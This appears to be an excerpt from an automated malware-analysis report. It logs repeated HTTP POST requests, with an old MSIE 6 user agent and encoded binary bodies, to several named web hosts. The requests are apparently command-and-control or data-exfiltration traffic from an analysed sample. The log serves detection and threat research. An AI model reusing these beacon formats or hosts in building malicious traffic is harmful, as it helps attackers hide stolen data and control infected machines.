                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 38 59 35 4b 6c 44 57 43 77 59 76 2f 46 58 51 4a 6e 4b 35 51 4a 69 34 6f 63 6c 50 44 75 61 41 55 4f 55 49 65 32 4e 63 4d 39 78 50 4b 63 4e 45 71 6f 49 37 2b 54 75 69 36 78 2f 67 4c 77 69 2b 39 35 61 35 34 66 32 62 71 73 78 46 66 5a 50 34 50 79 77 4b 53 73 77 77 6a 38 62 67 30 6f 45 75 6f 2b 4e 72 32 58 44 38 75 51 47 37 43 55 6e 37 78 30 52 56 37 50 63 33 6d 4d 74 63 43 52 61 39 48 68 67 42 69 6a 76 65 59 52 46 51 36 51 4c 4c 63 2f 6d 4b 7a 55 50 4b 4c 35 45 7a 32 42 4c 30 45 2b 49 2b 70 79 58 57 4b 44 77 6b 57 66 6e 68 68 69 69 32 68 52 74 6b 36 72 57 69 6f 42 62 6c 76 49 56 45 6e 51 41 31 69 35 45 56 6d 39 51 49 30 6f 53 54 62 4d 79 37 5a 30 39 6e 59 63 6e 2b 51 41 54 2b 53 66 34 49 75 2f 69 56 6c 37 4b 4d 37 59 61 39 76 2b 31 61 6e 34 4d 4d 7a 56 70 61 77 57 46 73 77 31 32 71 71 4f 35 65 47 6a 35 47 49 6d 51 32 6a 49 33 46 69 79 5a 6e 37 35 33 4e 30 5a 2b 72 67 54 46 2f 33 59 6b 42 7a 72 49 79 79 4e 2b 66 50 49 64 66 72 2f 51 4f 44 6c 35 67 45 63 34 4e 54 71 46 6c 56 6d 6d 6a 5a 6d 72 4b 64 4c 41 4e 46 6e 30 4f 71 4a 64 4e 58 54 6e 63 47 54 38 59 42 6b 4e 62 6f 36 33 38 58 65 64 58 64 6e 44 47 6c 79 68 54 77 46 30 36 52 6e 45 66 75 72 41 49 57 62 41 52 7a 47 43 61 52 53 49 59 69 36 48 4a 46 66 45 4e 64 33 4c 58 54 30 46 54 36 61 43 2f 56 2b 6e 71 52 69 4d 2b 55 75 57 32 50 33 79 32 38 43 46 36 70 47 71 75 37 44 34 61 4e 5a 32 6c 57 6d 63 6d 79 36 67 48 69 31 58 73 7a 6b 72 73 4d 70 53 75 2f 2b 68 36 74 71 72 6d 6a 64 69 37 63 4b 67 7a 6a 31 53 49 2f 66 79 43 2f 63 32 32 75 2f 43 41 2b 34 2b 37 6f 41 42 72 2f 59 7a 6b 73 4e 72 67 2b 67 47 31 35 38 41 53 78 6a 74 69 69 38 59 55 37 41 78 79 57 71 52 7a 30 6c 74 47 36 Data Ascii: 8Y5KlDWCwYv/FXQJnK5QJi4oclPDuaAUOUIe2NcM9xPKcNEqoI7+Tui6x/gLwi+95a54f2bqsxFfZP4PywKSswwj8bg0oEuo+Nr2XD8uQG7CUn7x0RV7Pc3mMtcCRa9HhgBijveYRFQ6QLLc/mKzUPKL5Ez2BL0E+I+pyXWKDwkWfnhhii2hRtk6rWioBblvIVEnQA1i5EVm9QI0oSTbMy7Z09nYcn+QAT+Sf4Iu/iVl7KM7Ya9v+1an4MMzVpawWFsw12qqO5eGj5GImQ2jI3FiyZn753N0Z+rgTF/3YkBzrIyyN+fPIdfr/QODl5gEc4NTqFlVmmjZmrKdLANFn0OqJdNXTncGT8YBkNbo638XedXdnDGlyhTwF06RnEfurAIWbARzGCaRSIYi6HJFfENd3LXT0FT6aC/V+nqRiM+UuW2P3y28CF6pGqu7D4aNZ2lWmcmy6gHi1XszkrsMpSu/+h6tqrmjdi7cKgzj1SI/fyC/c22u/CA+4+7oABr/YzksNrg+gG158ASxjtii8YU7AxyWqRz0ltG6
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 55 71 55 67 6b 6a 4a 77 77 59 73 58 6a 74 7a 36 5a 5a 48 58 58 44 55 77 52 52 63 43 55 41 66 6b 68 6c 6c 6f 4b 61 4c 64 48 64 66 70 6e 4a 65 58 55 74 61 39 55 61 2b 62 6a 44 6a 79 4e 79 73 6b 7a 70 35 7a 6e 49 4e 4a 58 43 72 72 32 53 2b 74 79 78 6c 37 37 43 69 4a 54 41 58 53 79 69 4a 53 6d 42 76 5a 36 52 4f 76 53 67 64 72 38 30 78 2f 2b 50 59 71 6b 74 78 43 54 53 4b 38 68 46 72 46 48 34 33 59 6d 4a 46 77 51 47 4a 31 2f 6f 31 4f 71 78 34 52 42 52 79 30 32 47 50 66 63 4c 65 65 42 45 55 2b 48 2f 74 61 78 71 75 5a 54 6c 66 34 49 50 38 42 62 36 54 55 67 31 59 6a 31 64 4d 79 71 47 62 46 59 41 70 50 4a 6a 73 50 47 72 35 76 75 2f 51 4c 73 43 33 61 69 6b 69 73 66 68 75 43 57 71 49 31 79 6a 54 2b 4b 37 4b 32 56 42 7a 44 72 35 34 53 5a 78 61 70 79 78 37 6f 38 56 50 35 52 59 46 4e 56 63 44 45 59 6b 70 46 47 77 46 32 44 38 6f 6c 52 48 47 32 34 41 4a 68 50 51 72 42 30 34 69 4f 67 5a 6a 66 44 4b 78 43 68 31 64 75 68 69 42 4b 54 64 47 71 59 30 5a 33 32 4d 32 67 6b 76 31 52 39 35 4c 44 33 53 75 41 54 5a 2f 2b 63 7a 4d 33 78 6e 32 37 65 31 36 43 32 6f 41 56 4f 57 52 4f 56 67 67 74 74 2f 54 37 30 33 77 30 68 72 35 64 4a 32 53 73 53 33 56 62 45 75 77 72 6d 5a 64 45 77 6b 5a 4b 61 42 72 38 68 47 34 67 30 4b 77 69 7a 74 52 45 72 4b 73 47 6a 2f 66 67 49 4b 4e 72 38 77 79 35 76 4c 72 33 6f 2b 58 55 63 5a 41 36 6c 53 62 6a 74 72 51 55 43 4d 69 7a 30 66 30 32 4f 54 37 6b 6f 51 49 2f 51 6a 55 7a 61 6d 52 62 61 5a 32 71 78 47 6c 38 4b 62 74 4f 6a 53 4d 43 70 42 32 38 79 78 52 55 66 57 52 57 31 6b 2b 34 33 57 56 33 46 49 73 33 37 56 79 78 6e 73 69 72 6f 42 6c 49 4c 61 53 64 49 58 51 43 45 4f 56 48 6e 76 45 4b 68 79 39 71 70 6b 37 75 57 43 33 5a 56 31 50 32 59 52 53 36 77 70 74 37 77 36 63 71 52 78 66 79 76 43 6a 61 67 4b 68 76 61 52 44 76 65 66 58 59 55 2f 45 2b 6f 5a 66 32 Data Ascii: UqUgkjJwwYsXjtz6ZZHXXDUwRRcCUAfkhlloKaLdHdfpnJeXUta9Ua+bjDjyNyskzp5znINJXCrr2S+tyxl77CiJTAXSyiJSmBvZ6ROvSgdr80x/+PYqktxCTSK8hFrFH43YmJFwQGJ1/o1Oqx4RBRy02GPfcLeeBEU+H/taxquZTlf4IP8Bb6TUg1Yj1dMyqGbFYApPJjsPGr5vu/QLsC3aikisfhuCWqI1yjT+K7K2VBzDr54SZxapyx7o8VP5RYFNVcDEYkpFGwF2D8olRHG24AJhPQrB04iOgZjfDKxCh1duhiBKTdGqY0Z32M2gkv1R95LD3SuATZ/+czM3xn27e16C2oAVOWROVggtt/T703w0hr5dJ2SsS3VbEuwrmZdEwkZKaBr8hG4g0KwiztRErKsGj/fgIKNr8wy5vLr3o+XUcZA6lSbjtrQUCMiz0f02OT7koQI/QjUzamRbaZ2qxGl8KbtOjSMCpB28yxRUfWRW1k+43WV3FIs37VyxnsiroBlILaSdIXQCEOVHnvEKhy9qpk7uWC3ZV1P2YRS6wpt7w6cqRxfyvCjagKhvaRDvefXYU/E+oZf2
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 54 38 76 31 38 77 4d 2b 31 59 73 47 49 30 42 72 43 6b 74 44 57 79 77 76 42 77 2b 70 52 44 46 46 35 34 4d 68 74 50 54 38 59 43 32 33 7a 5a 42 56 72 79 50 4a 7a 4b 73 77 58 6a 58 67 61 6a 70 6c 36 35 6f 6e 52 30 4a 56 50 42 72 74 77 67 37 33 47 64 49 79 77 71 74 77 52 65 66 37 36 54 78 75 5a 65 48 4a 48 54 30 36 56 52 30 41 68 4d 46 35 42 68 4e 4e 4a 38 6e 4e 68 6e 4c 30 66 68 4f 73 72 34 63 66 50 79 66 64 55 43 6d 69 49 67 69 66 77 73 59 6f 79 53 77 49 47 7a 6d 48 4b 71 35 33 31 54 35 4d 6b 36 56 7a 51 35 63 63 53 62 68 46 5a 59 47 65 31 7a 74 30 37 4e 45 6d 44 33 61 65 62 2b 55 44 6b 64 72 75 49 48 52 34 77 4c 72 6d 6a 69 35 76 6c 61 33 6f 55 31 63 2b 49 32 4b 2f 73 49 71 36 6e 5a 30 42 55 67 31 4f 4b 78 58 62 2f 35 4c 4f 33 67 49 4a 4e 78 78 44 66 31 54 41 57 68 35 47 58 48 6c 59 4c 4a 61 4c 6e 33 38 6a 66 64 55 31 74 30 52 43 6e 62 79 67 6d 63 47 57 61 4f 44 70 6a 67 71 79 4d 44 32 79 42 58 49 61 34 54 75 69 49 4d 73 63 68 6c 55 38 5a 73 37 78 55 68 51 49 4b 42 2f 69 6d 35 6b 61 6b 74 75 35 50 5a 64 49 55 55 4c 4c 49 34 74 59 4a 6c 61 72 38 42 7a 4a 4c 64 37 35 52 6e 4f 34 4a 46 6b 74 66 4d 65 42 62 30 31 76 51 79 59 35 35 44 72 46 4e 6f 6d 49 65 55 6d 30 4c 52 71 57 56 34 32 70 4a 43 6f 79 51 39 48 36 4a 6a 38 2b 44 48 37 42 34 47 2b 6c 56 4d 67 4e 35 35 37 4d 79 53 67 4d 30 39 33 45 68 52 42 34 66 7a 2b 65 44 44 51 51 57 67 49 70 66 44 66 45 31 55 67 32 68 44 52 4d 6f 63 65 50 4c 30 6b 4c 4f 32 32 6d 67 62 72 72 66 2f 43 48 4d 42 38 78 74 32 44 4b 6f 37 63 6d 4d 62 5a 67 55 58 4a 73 4b 6a 50 33 53 6a 6d 4b 6b 66 65 4e 6b 34 43 2b 56 52 4b 72 48 46 67 42 49 67 7a 57 4f 72 78 73 42 65 61 2f 51 64 64 5a 72 50 64 68 4b 76 34 75 39 2b 65 4d 61 65 33 42 56 75 36 79 57 4c 32 56 44 71 71 4b 35 79 53 75 45 4f 46 37 55 5a 6a 37 57 77 3d 3d Data Ascii: T8v18wM+1YsGI0BrCktDWywvBw+pRDFF54MhtPT8YC23zZBVryPJzKswXjXgajpl65onR0JVPBrtwg73GdIywqtwRef76TxuZeHJHT06VR0AhMF5BhNNJ8nNhnL0fhOsr4cfPyfdUCmiIgifwsYoySwIGzmHKq531T5Mk6VzQ5ccSbhFZYGe1zt07NEmD3aeb+UDkdruIHR4wLrmji5vla3oU1c+I2K/sIq6nZ0BUg1OKxXb/5LO3gIJNxxDf1TAWh5GXHlYLJaLn38jfdU1t0RCnbygmcGWaODpjgqyMD2yBXIa4TuiIMschlU8Zs7xUhQIKB/im5kaktu5PZdIUULLI4tYJlar8BzJLd75RnO4JFktfMeBb01vQyY55DrFNomIeUm0LRqWV42pJCoyQ9H6Jj8+DH7B4G+lVMgN557MySgM093EhRB4fz+eDDQQWgIpfDfE1Ug2hDRMocePL0kLO22mgbrrf/CHMB8xt2DKo7cmMbZgUXJsKjP3SjmKkfeNk4C+VRKrHFgBIgzWOrxsBea/QddZrPdhKv4u9+eMae3BVu6yWL2VDqqK5ySuEOF7UZj7Ww==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 79 4a 42 5a 42 59 7a 4f 31 59 75 46 49 2b 55 7a 39 7a 68 43 73 70 2f 52 54 7a 42 6b 7a 6a 73 70 67 41 43 66 57 43 78 65 52 42 51 67 79 52 2b 50 41 56 56 32 6f 52 51 45 44 68 54 52 50 57 77 78 78 54 32 6a 59 79 33 57 43 6e 4d 70 6a 65 44 4b 68 6a 6e 66 42 50 6c 6c 73 63 6d 6c 6a 66 56 7a 56 67 41 57 47 53 49 47 35 2f 71 57 2f 37 77 37 65 6c 43 58 58 71 6c 31 73 30 6a 63 67 78 56 6f 39 62 67 71 77 39 65 38 72 58 78 32 68 42 72 6b 47 55 42 37 74 38 6a 6a 69 39 78 79 4c 47 43 54 6d 6c 75 37 37 4c 73 72 44 6d 55 2f 69 49 2f 58 79 55 30 73 39 76 6e 70 61 78 39 4d 52 4d 57 62 37 66 70 34 6e 79 6e 2f 6f 4e 57 64 65 61 70 6b 41 6a 59 70 74 52 46 6e 53 66 49 53 47 63 67 76 4d 52 6d 39 53 69 46 4b 46 6c 47 56 52 47 54 73 4a 64 75 34 43 6e 31 43 49 59 30 66 43 56 36 69 34 34 44 73 71 35 32 45 52 59 35 68 41 6c 53 56 6d 54 57 61 58 65 78 64 5a 61 55 48 6d 31 35 36 67 74 34 36 54 2b 6d 6d 69 36 32 41 50 4b 34 66 4d 70 52 41 4c 37 43 33 34 59 66 66 53 62 53 43 58 61 7a 4b 4d 7a 71 77 45 43 71 4f 62 67 50 41 30 6f 54 67 51 73 66 72 75 4f 66 77 63 48 4e 6c 38 5a 37 70 32 7a 65 4c 52 44 4b 6b 37 6f 2f 59 32 42 46 36 68 50 4d 4d 42 64 39 51 5a 67 36 71 51 79 54 72 51 4f 53 6e 4d 49 62 49 63 50 70 68 78 76 38 4b 48 6a 51 72 4b 71 4b 71 70 74 6c 4b 46 74 61 66 42 43 68 72 36 41 41 72 4d 59 6e 53 58 56 55 76 55 79 48 6f 74 55 78 47 64 35 4e 39 66 57 2b 49 58 51 65 7a 4f 57 52 52 71 65 77 37 2b 2f 79 54 72 4c 53 67 59 59 74 63 79 55 67 75 49 55 62 44 36 7a 39 46 67 6f 4e 56 61 75 55 4c 50 53 6c 78 73 57 75 6f 47 32 50 75 73 62 62 4f 36 64 73 31 63 43 6d 66 6b 79 56 39 47 73 38 6e 65 32 72 56 6b 71 45 3d Data Ascii: yJBZBYzO1YuFI+Uz9zhCsp/RTzBkzjspgACfWCxeRBQgyR+PAVV2oRQEDhTRPWwxxT2jYy3WCnMpjeDKhjnfBPllscmljfVzVgAWGSIG5/qW/7w7elCXXql1s0jcgxVo9bgqw9e8rXx2hBrkGUB7t8jji9xyLGCTmlu77LsrDmU/iI/XyU0s9vnpax9MRMWb7fp4nyn/oNWdeapkAjYptRFnSfISGcgvMRm9SiFKFlGVRGTsJdu4Cn1CIY0fCV6i44Dsq52ERY5hAlSVmTWaXexdZaUHm156gt46T+mmi62APK4fMpRAL7C34YffSbSCXazKMzqwECqObgPA0oTgQsfruOfwcHNl8Z7p2zeLRDKk7o/Y2BF6hPMMBd9QZg6qQyTrQOSnMIbIcPphxv8KHjQrKqKqptlKFtafBChr6AArMYnSXVUvUyHotUxGd5N9fW+IXQezOWRRqew7+/yTrLSgYYtcyUguIUbD6z9FgoNVauULPSlxsWuoG2PusbbO6ds1cCmfkyV9Gs8ne2rVkqE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: btst=14d34012b627d917de443054740519bb|84.17.52.5|1688537169|1688537169|0|1|0; snkz=84.17.52.5Data Raw: 65 76 53 69 68 6a 4a 77 73 49 74 57 2b 68 73 4c 5a 5a 48 36 6c 54 55 77 44 50 41 43 55 43 49 77 68 6c 6e 48 79 48 43 78 46 39 38 4c 4d 70 62 66 6b 6a 59 47 43 41 35 44 63 79 46 49 4a 34 2b 38 6b 6f 7a 4d 73 76 56 62 65 34 4f 38 63 35 68 30 55 79 77 42 49 74 37 4d 6d 47 4f 73 42 58 4c 47 6d 65 59 50 51 56 79 4a 73 47 35 64 6d 4d 4b 2f 49 61 4c 32 4d 5a 4e 38 46 38 43 42 46 35 36 79 61 55 44 71 2b 4a 61 6c 54 44 6a 69 75 70 66 64 54 4c 36 4e 44 59 2b 56 6d 64 46 68 6f 30 76 73 78 4f 30 64 6b 30 54 33 46 30 46 43 7a 51 39 76 78 56 7a 43 76 48 78 57 48 61 55 64 70 55 7a 38 5a 4e 31 78 78 39 6c 64 31 46 4a 30 32 63 53 34 4f 59 42 62 32 70 66 54 75 39 6b 73 4e 57 41 49 66 45 78 66 44 68 55 4b 79 6f 4c 43 38 39 4b 6f 5a 64 63 42 48 51 66 31 46 76 74 73 72 67 53 77 42 41 6b 55 42 56 2b 53 6f 72 73 38 75 54 56 74 6d 31 67 4d 39 62 72 74 31 39 32 61 76 37 59 75 7a 32 31 4f 52 74 79 56 7a 47 44 6d 5a 53 69 34 68 45 56 73 71 72 62 6f 43 30 78 49 35 52 5a 4a 64 53 7a 46 7a 58 50 4c 67 37 5a 2b 6a 6f 6b 4f 77 42 47 42 50 32 67 71 62 36 70 47 76 43 79 4a 51 71 34 68 2f 36 42 49 44 68 34 58 33 50 56 68 76 76 73 6a 5a 74 35 2f 35 70 39 67 47 68 32 36 68 36 41 45 47 62 4f 6d 36 41 6f 50 4d 34 6e 58 4f 46 64 64 70 68 71 45 64 56 4e 38 70 46 48 4c 70 2f 72 6e 70 4e 58 52 52 42 6a 64 30 6c 32 50 32 52 77 44 42 57 4c 71 6e 53 63 76 55 72 52 42 59 42 4c 56 35 59 73 65 46 38 38 36 67 50 41 37 4b 46 53 73 72 53 37 70 6c 4f 61 4e 75 59 58 76 61 55 52 30 72 4b 52 33 55 35 51 6d 33 47 4a 2f 64 70 55 59 42 64 54 6e 78 30 68 62 49 45 38 70 39 36 4f 6e 50 45 66 2b 74 48 41 30 6a 4b 55 3d Data Ascii: evSihjJwsItW+hsLZZH6lTUwDPACUCIwhlnHyHCxF98LMpbfkjYGCA5DcyFIJ4+8kozMsvVbe4O8c5h0UywBIt7MmGOsBXLGmeYPQVyJsG5dmMK/IaL2MZN8F8CBF56yaUDq+JalTDjiupfdTL6NDY+VmdFho0vsxO0dk0T3F0FCzQ9vxVzCvHxWHaUdpUz8ZN1xx9ld1FJ02cS4OYBb2pfTu9ksNWAIfExfDhUKyoLC89KoZdcBHQf1FvtsrgSwBAkUBV+Sors8uTVtm1gM9brt192av7Yuz21ORtyVzGDmZSi4hEVsqrboC0xI5RZJdSzFzXPLg7Z+jokOwBGBP2gqb6pGvCyJQq4h/6BIDh4X3PVhvvsjZt5/5p9gGh26h6AEGbOm6AoPM4nXOFddphqEdVN8pFHLp/rnpNXRRBjd0l2P2RwDBWLqnScvUrRBYBLV5YseF886gPA7KFSsrS7plOaNuYXvaUR0rKR3U5Qm3GJ/dpUYBdTnx0hbIE8p96OnPEf+tHA0jKU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 79 4a 42 5a 42 59 7a 4f 31 59 75 46 49 2b 55 7a 39 7a 68 43 73 70 2f 52 54 7a 42 6b 7a 6a 73 70 67 41 43 66 57 43 78 65 52 42 51 67 79 52 2b 50 41 56 56 32 6f 52 51 45 44 68 54 52 50 57 77 78 78 54 32 6a 59 79 33 57 43 6e 4d 70 6a 65 44 4b 68 6a 6e 66 42 50 6c 6c 73 63 6d 6c 6a 66 56 7a 56 67 41 57 47 53 49 47 35 2f 71 57 2f 37 77 37 65 6c 43 58 58 71 6c 31 73 30 6a 63 67 78 56 6f 39 62 67 71 77 39 65 38 72 58 78 32 68 42 72 6b 47 55 42 37 74 38 6a 6a 69 39 78 79 4c 47 43 54 6d 6c 75 37 37 4c 73 72 44 6d 55 2f 69 49 2f 58 79 55 30 73 39 76 6e 70 61 78 39 4d 52 4d 57 62 37 66 70 34 6e 79 6e 2f 6f 4e 57 64 65 61 70 6b 41 6a 59 70 74 52 46 6e 53 66 49 53 47 63 67 76 4d 52 6d 39 53 69 46 4b 46 6c 47 56 52 47 54 73 4a 64 75 34 43 6e 31 43 49 59 30 66 43 56 36 69 34 34 44 73 71 35 32 45 52 59 35 68 41 6c 53 56 6d 54 57 61 58 65 78 64 5a 61 55 48 6d 31 35 36 67 74 34 36 54 2b 6d 6d 69 36 32 41 50 4b 34 66 4d 70 52 41 4c 37 43 33 34 59 66 66 53 62 53 43 58 61 7a 4b 4d 7a 71 77 45 43 71 4f 62 67 50 41 30 6f 54 67 51 73 66 72 75 4f 66 77 63 48 4e 6c 38 5a 37 70 32 7a 65 4c 52 44 4b 6b 37 6f 2f 59 32 42 46 36 68 50 4d 4d 42 64 39 51 5a 67 36 71 51 79 54 72 51 4f 53 6e 4d 49 62 49 63 50 70 68 78 76 38 4b 48 6a 51 72 4b 71 4b 71 70 74 6c 4b 46 74 61 66 42 43 68 72 36 41 41 72 4d 59 6e 53 58 56 55 76 55 79 48 6f 74 55 78 47 64 35 4e 39 66 57 2b 49 58 51 65 7a 4f 57 52 52 71 65 77 37 2b 2f 79 54 72 4c 53 67 59 59 74 63 79 55 67 75 49 55 62 44 36 7a 39 46 67 6f 4e 56 61 75 55 4c 50 53 6c 78 73 57 75 6f 47 32 50 75 73 62 62 4f 36 64 73 31 63 43 6d 66 6b 79 56 39 47 73 38 6e 65 32 72 56 6b 71 45 3d Data Ascii: yJBZBYzO1YuFI+Uz9zhCsp/RTzBkzjspgACfWCxeRBQgyR+PAVV2oRQEDhTRPWwxxT2jYy3WCnMpjeDKhjnfBPllscmljfVzVgAWGSIG5/qW/7w7elCXXql1s0jcgxVo9bgqw9e8rXx2hBrkGUB7t8jji9xyLGCTmlu77LsrDmU/iI/XyU0s9vnpax9MRMWb7fp4nyn/oNWdeapkAjYptRFnSfISGcgvMRm9SiFKFlGVRGTsJdu4Cn1CIY0fCV6i44Dsq52ERY5hAlSVmTWaXexdZaUHm156gt46T+mmi62APK4fMpRAL7C34YffSbSCXazKMzqwECqObgPA0oTgQsfruOfwcHNl8Z7p2zeLRDKk7o/Y2BF6hPMMBd9QZg6qQyTrQOSnMIbIcPphxv8KHjQrKqKqptlKFtafBChr6AArMYnSXVUvUyHotUxGd5N9fW+IXQezOWRRqew7+/yTrLSgYYtcyUguIUbD6z9FgoNVauULPSlxsWuoG2PusbbO6ds1cCmfkyV9Gs8ne2rVkqE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 39 50 4d 49 38 31 4d 32 31 59 74 44 48 6d 67 50 47 73 63 43 6d 50 7a 62 76 6f 30 35 75 36 2f 44 4e 31 6e 38 32 75 65 56 6b 78 6d 41 6b 77 79 4b 74 62 34 39 41 65 32 41 5a 4c 33 42 61 2f 4b 2f 4a 79 38 4d 78 75 47 4b 37 4d 6a 33 41 50 44 6a 56 68 2b 42 51 6f 48 33 4f 48 72 63 6d 67 2f 6c 38 59 6c 62 49 6a 57 39 68 31 39 7a 63 78 54 39 43 4a 35 65 5a 37 4b 50 47 33 36 2b 59 65 6e 35 35 70 6e 77 72 2f 6a 45 34 6b 42 66 73 66 2b 4d 39 53 73 59 4b 2f 74 67 5a 33 57 42 5a 36 79 38 4c 6b 51 66 76 39 46 4a 39 77 73 53 6a 73 79 4b 49 37 52 4d 43 49 6d 4d 56 62 35 77 38 36 70 56 30 77 4d 45 47 77 70 34 6e 2f 70 79 35 71 30 76 6e 43 37 2f 6d 6d 77 4e 77 61 6b 6b 69 58 69 6c 50 42 61 44 34 77 63 64 4a 4a 67 55 2f 72 30 7a 32 47 52 74 34 4e 4e 6e 6c 6d 4f 4e 32 63 33 74 31 5a 47 64 75 67 57 52 33 79 4d 46 79 6f 79 71 4e 50 4e 4a 33 31 4c 70 65 46 51 6b 4f 46 52 67 6c 39 58 33 71 36 48 51 59 49 34 55 4b 72 52 2f 53 69 36 4f 62 50 39 37 77 65 66 74 57 67 76 42 41 44 35 72 6d 4c 58 70 63 65 70 76 4f 55 32 61 6f 70 30 2b 46 5a 56 6b 7a 71 67 4b 43 52 35 7a 41 4c 45 47 43 44 51 30 6e 52 6b 38 4e 52 4b 62 37 41 57 68 77 57 5a 45 65 6a 6c 57 6c 76 6c 6b 59 4d 77 34 6c 71 68 50 64 78 6c 4e 32 7a 47 58 76 56 43 53 2b 57 74 69 64 4f 45 4f 70 41 53 7a 55 54 6f 4f 4a 2f 54 73 57 6d 4c 61 59 75 64 31 31 66 43 31 55 4b 4d 68 4b 46 71 69 30 6b 68 4b 36 7a 71 41 2f 4f 43 67 44 43 32 4c 6d 32 64 50 4e 38 38 54 70 57 4a 54 41 71 73 68 4f 62 79 45 62 6f 6d 70 79 64 31 4b 7a 4c 54 75 30 46 4b 31 73 77 38 2f 56 65 73 43 61 74 72 4b 61 64 36 77 50 59 73 77 69 39 47 61 4f 74 69 49 4e 49 45 61 44 50 37 73 53 6c 31 6e 34 46 4b 38 53 63 5a 70 61 39 2b 44 33 41 47 62 61 67 3d 3d Data Ascii: 9PMI81M21YtDHmgPGscCmPzbvo05u6/DN1n82ueVkxmAkwyKtb49Ae2AZL3Ba/K/Jy8MxuGK7Mj3APDjVh+BQoH3OHrcmg/l8YlbIjW9h19zcxT9CJ5eZ7KPG36+Yen55pnwr/jE4kBfsf+M9SsYK/tgZ3WBZ6y8LkQfv9FJ9wsSjsyKI7RMCImMVb5w86pV0wMEGwp4n/py5q0vnC7/mmwNwakkiXilPBaD4wcdJJgU/r0z2GRt4NNnlmON2c3t1ZGdugWR3yMFyoyqNPNJ31LpeFQkOFRgl9X3q6HQYI4UKrR/Si6ObP97weftWgvBAD5rmLXpcepvOU2aop0+FZVkzqgKCR5zALEGCDQ0nRk8NRKb7AWhwWZEejlWlvlkYMw4lqhPdxlN2zGXvVCS+WtidOEOpASzUToOJ/TsWmLaYud11fC1UKMhKFqi0khK6zqA/OCgDC2Lm2dPN88TpWJTAqshObyEbompyd1KzLTu0FK1sw8/VesCatrKad6wPYswi9GaOtiINIEaDP7sSl1n4FK8ScZpa9+D3AGbag==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 66 59 6f 32 38 38 73 33 31 59 76 47 6b 35 70 50 49 71 70 51 76 54 54 77 68 71 67 52 4e 76 63 32 4c 37 34 4a 78 67 58 76 72 54 58 77 32 7a 59 71 63 66 51 5a 67 38 6b 64 57 44 79 6f 4c 6d 41 4c 57 54 6a 58 47 65 39 6d 57 64 39 77 54 6b 2f 64 4c 69 37 72 78 30 41 71 33 76 36 73 66 4e 6d 6a 37 58 71 30 32 7a 4f 7a 6a 51 32 37 38 34 6c 4d 6f 71 34 64 6c 34 77 4f 32 55 47 51 65 74 59 57 68 64 30 34 4b 68 37 38 54 6b 77 66 50 77 6d 4f 56 7a 74 78 65 32 67 46 4e 74 4d 53 34 33 4b 71 50 4b 58 58 6f 7a 65 53 78 32 53 4d 56 66 37 4c 36 6f 72 43 72 6e 67 36 6f 44 6b 56 72 4f 75 70 57 66 61 54 6a 45 39 4b 62 53 75 4c 61 6b 67 45 75 45 68 55 74 46 44 30 61 37 45 4e 53 48 4f 72 46 71 30 61 4f 71 4c 54 77 37 4f 63 66 45 65 38 6f 62 6a 67 67 4f 74 51 6b 48 6a 78 70 6a 68 7a 68 4f 34 62 34 46 4b 64 48 2b 4e 37 31 48 35 35 34 6a 67 62 4a 51 2b 4b 30 55 41 73 56 4f 51 70 7a 32 30 49 39 79 71 36 49 52 69 56 42 44 37 62 72 71 55 70 38 6a 4b 50 4b 42 35 45 4a 42 61 57 68 36 4a 6a 36 46 6d 37 34 53 6c 76 2b 42 52 2b 36 59 53 70 2b 6c 36 4e 35 6d 43 41 59 55 61 51 6a 53 73 49 63 56 65 31 30 76 48 4e 71 58 74 58 30 66 37 61 76 64 4e 6f 6f 56 78 75 56 49 75 34 49 69 41 6d 4b 75 77 75 41 4d 4c 4d 38 69 4d 41 44 4f 45 5a 4e 7a 6b 43 4f 57 4c 68 6d 77 51 34 32 7a 68 68 52 58 61 77 78 5a 52 53 6c 53 46 49 64 4f 39 77 66 79 79 35 36 6d 66 62 51 61 49 36 53 36 44 4c 2f 36 73 5a 62 66 63 36 2b 77 2f 56 55 41 52 50 78 79 36 44 50 39 4e 64 38 41 2b 6f 57 4d 63 63 56 39 32 55 52 56 2b 4d 6d 45 64 55 76 78 37 78 44 4f 56 73 6f 63 48 46 4a 6b 72 74 6c 4e 34 68 4f 6f 30 42 69 58 52 52 46 36 51 4f 77 76 37 62 55 41 66 30 4a 55 31 42 4d 57 67 74 49 78 73 73 4f 41 63 73 62 56 2b 56 67 6d 2b 36 7a 47 4b 6e 42 75 43 30 6a 56 41 2b 6f 65 30 46 6f 72 65 44 6c 4f 34 63 4f 68 58 45 56 67 3d 3d Data Ascii: 